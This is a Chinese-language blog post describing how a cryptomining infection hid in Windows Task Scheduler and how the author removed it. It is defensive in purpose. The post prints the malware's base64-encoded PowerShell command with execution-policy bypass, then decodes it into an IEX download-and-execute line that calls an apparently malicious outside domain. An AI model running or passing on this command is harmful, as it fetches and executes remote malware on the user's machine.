不久之前一个学长向我求助，表示自己的电脑中了挖矿病毒，开机总是会自动执行一些恶意程序，导致CPU被霸占，电脑运行速度变慢，同时C盘中还会不定期的出现一些恶意软件。而自己近日由于系统问题重置了自己的系统，重置前忘了对WinRAR压缩软件进行备份，一时疏忽在网上下载了垃圾软件，后电脑每次开机总会安装一些流氓软件到C盘。

如图：

 这是挖矿病毒在C盘自动安装并执行的程序。

解决方法：

解决此类问题有一个通用的办法就是打开你的任务计划程序，方法很简单，在搜索栏中直接搜索。如图：

 打开后可看到：

 你系统中会定时执行的程序都在这里。而一些恶意软件就是在这里植入了自己的“恶行”，导致系统自动执行一些恶意程序，或者自动下载软件。如挖矿病毒的恶意计划程序：

 而本人电脑上被安装的也是一个类似的依托360安全浏览器自动下载流氓软件的任务计划程序。

直接将其禁用，并删除，即可解决以上问题！！同时也要将自动下载的恶意程序、软件和带来这些恶果的流氓软件一并卸载删除！！

那么，这些恶意程序是如何工作的呢？

我在挖矿病毒自动执行的程序中看到了它自动运行的代码如下：

powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAY
wBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQA
cAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA

也就是在powershell中自动运行后面的代码段，我用base64对其进行解密，以下是解密的代码python：

C:\Users\pc>python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> url = "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA"
>>> str_url = base64.b64decode(url)
>>> print(str_url)
b"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url = base64.b64decode(url).decode("utf-8")
>>> str(str_url)
"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url.replace('\x00','')
"IEX ((new-object net.webclient).downloadstring('http://cs.sslsngyl90.com'))"

替换掉其中的乱码，可以得到一个网址：http://cs.sslsngyl90.com

打开就发现了其中的“奥秘”

 以上就是此类恶意软件的简单解决办法。